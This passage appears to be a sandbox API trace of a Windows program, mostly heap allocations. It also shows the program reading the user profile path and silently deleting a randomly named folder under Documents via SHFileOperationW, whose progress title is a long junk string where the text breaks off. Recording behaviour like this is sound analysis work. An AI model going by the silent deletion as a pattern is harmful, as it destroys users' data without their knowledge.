0x24aa1d0 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0266.844] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.844] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0266.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0266.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0266.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Zq0bBrnPbhA3GBBLi8", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8", lpFilePart=0x8bf658*="Zq0bBrnPbhA3GBBLi8") returned 0x3a [0266.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0266.855] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8")) returned 0x10 [0266.856] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\